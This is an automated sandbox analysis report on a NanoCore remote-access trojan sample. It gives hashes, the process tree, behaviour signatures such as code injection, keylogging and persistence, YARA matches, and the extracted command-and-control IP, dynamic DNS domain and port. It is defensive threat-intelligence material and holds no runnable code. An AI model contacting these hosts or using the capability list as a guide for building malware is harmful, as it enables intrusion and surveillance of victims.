Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report e5bd3238d220c97cd4d6969abb3b33e0

Overview

General Information

Sample Name:e5bd3238d220c97cd4d6969abb3b33e0 (renamed file extension from none to exe)
Analysis ID:320085
MD5:7b00ed250c793c95f4d98c637302fb6f
SHA1:7f8d0c101fa8c5e875aa76c9a9c139d8800867b3
SHA256:5108996bad93e37f7f6e003be1edf9dba10a99fafc3894f8d4fd01226e10b0a5
Tags:NanoCore

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Contains functionality to inject code into remote processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • e5bd3238d220c97cd4d6969abb3b33e0.exe (PID: 2152 cmdline: 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe' MD5: 7B00ED250C793C95F4D98C637302FB6F)
    • RegAsm.exe (PID: 4560 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
  • dhcpmon.exe (PID: 6488 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)
    • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • DiagnosticsHub.StandardCollector.Service.exe.bat (PID: 6976 cmdline: 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat' MD5: E10CD6FAB33374FB1A0002F89D0BFE45)
    • RegAsm.exe (PID: 7108 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["255.255.255.255", "87.65.28.27"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x23a47:$a: NanoCore
    • 0x23aa0:$a: NanoCore
    • 0x23add:$a: NanoCore
    • 0x23b56:$a: NanoCore
    • 0x23aa9:$b: ClientPlugin
    • 0x23ae6:$b: ClientPlugin
    • 0x243e4:$b: ClientPlugin
    • 0x243f1:$b: ClientPlugin
    • 0x1b2a5:$e: KeepAlive
    • 0x23f31:$g: LogClientMessage
    • 0x23eb1:$i: get_Connected
    • 0x15a79:$j: #=q
    • 0x15aa9:$j: #=q
    • 0x15ae5:$j: #=q
    • 0x15b0d:$j: #=q
    • 0x15b3d:$j: #=q
    • 0x15b6d:$j: #=q
    • 0x15b9d:$j: #=q
    • 0x15bcd:$j: #=q
    • 0x15be9:$j: #=q
    • 0x15c19:$j: #=q
    0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x112dd:$x1: NanoCore.ClientPluginHost
    • 0x43ce5:$x1: NanoCore.ClientPluginHost
    • 0x766ed:$x1: NanoCore.ClientPluginHost
    • 0x1131a:$x2: IClientNetworkHost
    • 0x43d22:$x2: IClientNetworkHost
    • 0x7672a:$x2: IClientNetworkHost
    • 0x14e4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0x47855:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0x7a25d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0x11045:$a: NanoCore
      • 0x11055:$a: NanoCore
      • 0x11289:$a: NanoCore
      • 0x1129d:$a: NanoCore
      • 0x112dd:$a: NanoCore
      • 0x43a4d:$a: NanoCore
      • 0x43a5d:$a: NanoCore
      • 0x43c91:$a: NanoCore
      • 0x43ca5:$a: NanoCore
      • 0x43ce5:$a: NanoCore
      • 0x76455:$a: NanoCore
      • 0x76465:$a: NanoCore
      • 0x76699:$a: NanoCore
      • 0x766ad:$a: NanoCore
      • 0x766ed:$a: NanoCore
      • 0x110a4:$b: ClientPlugin
      • 0x112a6:$b: ClientPlugin
      • 0x112e6:$b: ClientPlugin
      • 0x43aac:$b: ClientPlugin
      • 0x43cae:$b: ClientPlugin
      • 0x43cee:$b: ClientPlugin
      Click to see the 96 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.RegAsm.exe.5210000.4.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      1.2.RegAsm.exe.5210000.4.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 19 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 4560, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeAvira: detected
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeAvira: detected
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batAvira: detection malicious, Label: HEUR/AGEN.1100084
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batAvira: detection malicious, Label: HEUR/AGEN.1100084
        Found malware configurationShow sources
        Source: RegAsm.exe.7108.14.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["255.255.255.255", "87.65.28.27"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
        Source: RegAsm.exe.7108.14.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["255.255.255.255", "87.65.28.27"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeReversingLabs: Detection: 68%
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeReversingLabs: Detection: 68%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
        Source: Yara matchFile source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE
        Source: 1.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 1.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C93C FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C93C FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF65E FindFirstFileW,Sleep,FindNextFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EC93C FindFirstFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EBF27 FindFirstFileW,FindNextFileW,FindClose,

        Networking:

        barindex
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: windowslivesoffice.ddns.net
        Source: unknownDNS query: name: windowslivesoffice.ddns.net
        Source: global trafficTCP traffic: 192.168.2.7:49715 -> 87.65.28.27:20377
        Source: global trafficTCP traffic: 192.168.2.7:49715 -> 87.65.28.27:20377
        Source: Joe Sandbox ViewIP Address: 87.65.28.27 87.65.28.27
        Source: Joe Sandbox ViewIP Address: 87.65.28.27 87.65.28.27
        Source: Joe Sandbox ViewASN Name: PROXIMUS-ISP-ASBE PROXIMUS-ISP-ASBE
        Source: Joe Sandbox ViewASN Name: PROXIMUS-ISP-ASBE PROXIMUS-ISP-ASBE
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,
        Source: unknownDNS traffic detected: queries for: windowslivesoffice.ddns.net
        Source: unknownDNS traffic detected: queries for: windowslivesoffice.ddns.net
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
        Source: RegAsm.exe, 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices
        Source: RegAsm.exe, 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_00A0CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY
